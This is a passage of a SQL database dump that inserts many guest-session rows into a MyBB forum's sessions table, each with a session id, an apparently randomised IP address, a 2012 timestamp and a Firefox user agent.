('acabc7cf48b163b5c3df6bde557cc647', '0', '228.160.126.160', '1352770701', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('61e19359e0af24ff48bb89db20d126de', '0', '86.92.29.55', '1352770703', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('075179da06d0798ade96688263ebc9a2', '0', '139.38.238.81', '1352770705', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf76beb91b889ef0b91bad8aa591d3ca', '0', '152.133.28.138', '1352770707', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('497a7da5137d1055d891874ad5fc7f15', '0', '242.67.0.83', '1352770709', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3fb58014be399193d9b2025694c36f63', '0', '17.15.219.139', '1352770711', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49971dd474804bfed0e416b319d91227', '0', '254.199.27.238', '1352770713', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0bc60be93c3f5bf60efd3a29129acc14', '0', '219.242.254.151', '1352770715', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ea05a1d226a81a0d48e978abe0675bd', '0', '151.123.133.201', '1352770717', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c456b29473fd1d0a3231fdc5c170476', '0', '245.175.152.254', '1352770719', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c059e8a122dd4dd270dcea85ae75911', '0', '112.206.201.87', '1352770723', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e2e7bd6baf446187304a33d7a5a316b2', '0', '113.230.88.62', '1352770725', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b8ad7128fd36dc9a87ad8983ee0a929', '0', '156.211.106.3', '1352770727', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('51a128e9fe5bf0127e207cd1fe887130', '0', '69.246.229.15', '1352770728', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cd06ed1fbecc33058b93b535b831fe0f', '0', '115.79.93.152', '1352770738', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dbcc6f0732f722058d47339d9c7be0ea', '0', '180.48.188.31', '1352770742', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('92f3e94b98a1c3149eb936f380661cf2', '0', '107.78.73.165', '1352770743', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3f06a89e61579abb2d6552fc8c1dee54', '0', '178.225.92.236', '1352770744', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('048a92687d3a4f87604031305498cd5c', '0', '66.225.11.166', '1352770745', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a5820e762bf51833c0235dc34e19fd9d', '0', '113.136.14.193', '1352770745', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8d52205a263c9195da4af11e9024727d', '0', '171.32.55.187', '1352770746', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c670f26e90812cd672db56d27c2f4275', '0', '201.27.172.253', '1352770746', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('307f699e1175b0145a5dfee431a2f7ba', '0', '79.249.226.30', '1352770747', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2bf613faac5225e610178c4b70f84e3e', '0', '171.242.199.10', '1352770748', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f274cfde6da4220471e14f81fa5f594d', '0', '170.55.177.21', '1352770748', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f59d62cefd39530c003615e7a380bb8', '0', '252.70.224.54', '1352770749', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5c4f90e53687de21dd9c4ef792b52b7', '0', '128.224.50.241', '1352770750', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('98ac605a1689ab33e15cf59125d97c07', '0', '168.124.163.23', '1352770766', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f082029fe7eab06e609250d264e076af', '0', '107.234.133.229', '1352770751', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f6f43cbe59b356e730c52fad7f6133e4', '0', '224.246.229.80', '1352770751', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('342216b986458fec6f64347d74e8beaa', '0', '203.108.89.49', '1352770752', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('82f981afbd4f544ddf77a1c6155a0385', '0', '139.222.154.25', '1352770753', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a3eb7813b4ec586eaefe62d8d70a3dd', '0', '143.97.233.200', '1352770753', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ac5304b383510662578c5b75e95d0e4', '0', '20.83.140.159', '1352770754', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0c5ff4cc6b1649c44f7204b305a1d879', '0', '113.223.158.37', '1352770756', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3243788e5048abe4da77b5151d2beef3', '0', '88.172.4.213', '1352770759', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e47dda5683f21551cbfe2f57cef389e', '0', '239.112.13.201', '1352770764', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ff6053a058fbcfb841b1dc6bbd812c7', '0', '37.164.90.76', '1352770765', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('27171a566fdd165cbb31fd09853b00c7', '0', '3.173.177.194', '1352770768', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4de38239a5847c47043bc41731c018dc', '0', '30.164.86.247', '1352770769', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1c28cbbcb81d33abc4b8b3e4b68eb90f', '0', '11.31.168.233', '1352770770', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('75f959da090dd04387853aa39e36b8bf', '0', '26.15.247.37', '1352770771', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a5b74137f9d88b5a1dc1dc05a6d7502', '0', '139.79.57.56', '1352770773', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('add3f3995d44a0c40c9dcc5e620e9610', '0', '122.196.40.249', '1352770773', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('16c396fa1977151521c29045e3633185', '0', '22.202.194.89', '1352770774', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3c96d7bb19619c980025be75cc3f2c8c', '0', '179.36.37.222', '1352770774', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('19eb13a1981d45fea1e09d27759ee2a8', '0', '116.55.128.221', '1352770775', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1b6376fc1938fa72c48f2d20a3d18341', '0', '158.146.187.221', '1352770776', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('27a16142bb39bbed50f92f9166c5bfb6', '0', '249.24.224.233', '1352770776', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b40d73d3f97cdd119e4eadc2c75803f', '0', '1.39.116.35', '1352770777', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7593701b5d99de967dcc5bd828a266c1', '0', '251.143.224.46', '1352770779', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('97ef17f586ff3465f38f524762838e6a', '0', '122.199.95.149', '1352771027', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5d4b74de0c1335eb0d84fab93d01dc3a', '0', '191.38.41.98', '1352770780', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4b169eceb44bd460db82fc312f4e35f', '0', '64.186.191.6', '1352770781', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e86ba4dff5e30a2e376ef30b04ade465', '0', '160.177.51.229', '1352770782', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('32d43d91e31ce220e711a6aa444856d2', '0', '183.244.92.139', '1352770786', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e2bcd45a234476a3c428a1be22cada0', '0', '52.20.187.63', '1352770789', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f569f30d01b0e51cb506ce0412cafc5', '0', '241.206.7.181', '1352770790', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b8fb6a251e7387b3f612cb03e49f37c8', '0', '28.140.169.230', '1352770793', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff08b5f07dac6befb6920d4b63c66b78', '0', '179.188.155.130', '1352770795', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('966f292656fb8dfef011dff3bfceff52', '0', '219.20.166.180', '1352770797', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('99b2a77ebd1859327825914140a72ba6', '0', '192.28.215.144', '1352770798', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('15d93fb90d2e7177d4f0b6591a31a860', '0', '136.37.155.190', '1352770798', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4458372b6212ebc203bc130871bfeba0', '0', '97.224.29.103', '1352770799', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('26642aa01875e4c0edc6043ae8155649', '0', '107.240.245.60', '1352770800', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('017f34d1006cea7393a39e8831ed774e', '0', '254.49.135.134', '1352770801', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('912fa95f33f28cbde6ebbff0ee91fc5d', '0', '131.34.157.26', '1352770801', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b544629417d18e02b54bcfa066fa20f7', '0', '100.227.88.69', '1352770802', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5baf5c7dc6960187ab5350fd7f41910', '0', '220.35.113.162', '1352770803', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bd3c150dc96547c5e6bf7a9ce81d8c57', '0', '162.103.104.196', '1352770803', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ccd0174c223603bb95ee7cb502afecf', '0', '44.48.228.143', '1352770806', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed0f2325eec1929ccd63fb6c2bd8511f', '0', '107.91.215.219', '1352770808', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5d6a83f0b42af8502b2e51e65aa1410d', '0', '165.48.127.48', '1352770810', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4457fb52959b2fd3ea78747a18727046', '0', '33.37.224.51', '1352770812', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a07e9dc955cabc0d170baf719f0ca605', '0', '30.217.71.155', '1352770813', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a61ae780a6c22a12940c99bcb3c6d30', '0', '217.198.207.17', '1352770817', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f8bc90097fa3d269509e674c11d73ff', '0', '182.151.250.135', '1352770817', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f070d9e0728234ad5ffcd7658a430163', '0', '26.37.181.237', '1352770818', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0821f42b420819afbff533bab7639f0a', '0', '179.136.79.193', '1352770820', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1cf4cbf77f66e40fb53f1130831c80c4', '0', '12.142.153.222', '1352770820', '/index.php?', 'Mozilla/5.0 (Windows NT 